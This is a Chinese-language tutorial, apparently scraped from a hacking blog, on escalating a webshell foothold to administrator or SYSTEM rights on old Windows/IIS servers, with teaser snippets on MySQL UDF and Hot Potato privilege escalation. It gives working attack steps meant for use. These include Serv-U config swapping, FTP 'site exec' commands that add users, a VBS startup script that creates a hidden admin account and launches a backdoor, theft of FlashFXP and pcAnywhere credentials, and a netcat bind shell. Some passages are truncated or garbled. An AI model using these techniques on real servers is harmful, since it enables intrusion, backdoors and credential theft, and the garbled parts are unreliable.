第一
如果伺服器上有裝了pcanywhere服務端,管理員為了管理方便
也給了我們方便,到系統盤的documents and settings/all us
破解就使用pcanywhere連線就ok了
第二 有很多小黑問我這麼把webshell的iis user許可權提公升
一般伺服器的管理都是本機設計完畢然後上傳到空間裡,
那麼就會用到ftp,伺服器使用最多的就是servu
那麼我們就利用servu來提公升許可權
通過servu提公升許可權需要servu安裝目錄可寫~
下來,然後在本機上安裝乙個servu把servudaemon.ini放到本地安裝資料夾下覆蓋,
啟動servu新增了乙個使用者,設定為系統管理員,目錄c:/,具有可執行許可權
然後去servu安裝目錄裡把servudaemon.ini更換伺服器上的。
用我新建的使用者和密碼連線~
好的,還是連上了
ftp
ftp>open ip
connected to ip.
220 serv-u ftp server v5.0.0.4 for winsock ready...
user (ip:(none)): id //剛才新增的使用者
331 user name okay, please send complete e-mail address as password.
password:password //密碼
230 user logged in, proceed.
ftp> cd winnt //進入win2k的winnt目錄
250 directory changed to /winnt
ftp>cd system32 //進入system32目錄
250 directory changed to /winnt/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系統的net.exe
檔案加使用者。
如果提示沒有許可權,那我們就
把後門(server.exe) 傳他system32目錄
然後寫乙個vbs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存為xx.vbe
這個教本的作用是建立user使用者密碼為pass
並且提公升為管理員
然後執行system32目錄下的server.exe
把這個教本傳他 c:/documents and settings/all users/「開始」選單/程式/啟動
目錄 這樣管理員只要一登陸就會執行那個教本.
接下來就是等了.等他登陸.
第三 就是先檢查有什麼系統服務,或者隨系統啟動自動啟動的程式和管理員經常使用的軟體, 比如諾頓,vadministrator,金山,瑞星,winrar甚至qq之類的,是否可以寫,如果可以就修改其程式, 繫結乙個批處理或者vbs,然後還是等待伺服器重啟。
第四 查詢conn和config ,pass這型別的檔案看能否得到sa或者mysql的相關密碼,可能會有所
收穫等等。
第五 使用flashfxp也能提公升許可權,但是成功率就看你自己的運氣了
首先找到flashfxp資料夾,開啟(編輯)sites. dat,這個檔案這是什麼東西密碼和使用者名稱,
而且密碼是加了密的。 如果我把這些檔案copy回本地也就是我的計算機中,替換我本地的相應檔案。然後會發現 開啟flashfxp在站點中開啟站點管理器一樣。又可以新增n多肉雞啦~~嘻嘻~
唔??不對啊,是來提公升許可權的啊,暈,接著來別半途而廢。
大家看看對方管理員的這站點管理器,有使用者名稱和密碼,密碼是星號的。經過用xp星號密碼 檢視器檢視,然後和sites.dat中加密了密碼做比較發現並未加密而是查到的密碼是明文顯示, 然後最終把這個**管理員的密碼從這堆東西中找
經過測試只要把含有密碼和使用者名稱的sites.dat檔案替換到本地相應的檔案就可以在本地
還原對方管理員的各個站點的密碼。
第六 win2k+iis5.0預設情況下應用程式保護選項是"中(共用的)",這時iis載入isapi是用的
iwam_computername使用者身份執行。
但預設情況下win2k+iis5對於一些特殊isapi又要以system身份載入。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是簡單的判斷isapi的檔名,並且沒有做目錄限制,
以system許可權載入的isapi有:
所以利用這很容易得到system許可權。並且判斷檔名的時候有個bug,比如請求/scripts/test%81%5cssinc.dll也將會認為是請求的ssinc.dll,就是分離檔案路徑的時候沒有考慮到雙位元組的 遠東版問題。ssinc.dll在處理包含檔案路徑的時候也有乙個問題,就是"/"、"/"只識別了乙個 "/",所以如果請求裡面使用"/",就會錯誤的處理包含檔案路徑,有可能洩露東西或者出現許可權 漏洞,這種漏洞很多別的地方( php、asp等)也還存在。
載入這些isapi不是單以檔名做依據了,而是加了路徑,應該是修正了此問題。
一般預設情況下是:
正常情況下這些路徑都guest不能寫,但如果配置不好,這些路徑iis user能夠寫了就一樣可以提公升許可權了
可以把isapihack.dll上傳到iis的可執行目錄,檔名可叫ssinc.dll或者admin.dll等(上面列的13個檔名之一)。
然後等待iis重啟載入此dll,就可以獲得許可權了
第七 然後用l0pht等軟體進行破解,只要能拿到,肯花時間,就一定可以破解。
第八 pipeupadmin(windows 2000下), 在本機執行可以把當前使用者帳號加入管理員組。普通使用者和guests組使用者都可以成功執行。
第九 serv-u ftp server 本地許可權提公升漏洞:
很多主機的c:/documents and settings/all users/ documents目錄以及下邊幾個子目錄documents沒有設定許可權,導致可以在這個目錄上傳並執行exp. 直接上傳了serv-u local exploit 和nc, 並且把serv-u的本地提公升許可權的名字命名為su.exe 檔案就放在c:/documents and settings/all users/ documents, 然後我們用su.exe直接建立使用者,也可以**乙個shell過來的。
具體命令:
建立使用者: serv-u.exe "cmd"
>user xl
>pass 111111
**shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
webshell寫入啟動專案提權
我們在拿到乙個 的webshell的時候如果想進一步的獲得 的伺服器許可權.我們可以檢視現在伺服器上系統盤的可讀可寫目錄 如果說伺服器上的 c documents and settings all users 開始 選單 程式 啟動 目錄存在可讀可寫目錄 那麼我們就可以執行上傳乙個vbs或者bat的...
mysql 提權 通過Mysql提權的幾種姿勢
本文記錄利用mysql資料庫,在拿到shell之後進行提權的兩種方法。一 udf提權 基本步驟 1 匯出udf.dll檔案到指定目錄 有些webshell整合,直接導 出即可,沒有,則需要上傳 2 基於udf.dll建立自定義函式cmdshell 3 利用自定義函式,執行高許可權cmd命令 以下按照...
Hot Potato Windows上的提權漏洞
windows 7,8,10,server 2008以及server 2012版本的作業系統平台中存在提權漏洞,攻擊者可以利用這一漏洞發動新型的網路攻擊。工作機制 在windows作業系統的預設配置下,hot potato 也被稱為potato 能夠利用windows中的漏洞來獲取本地計算機的控制許...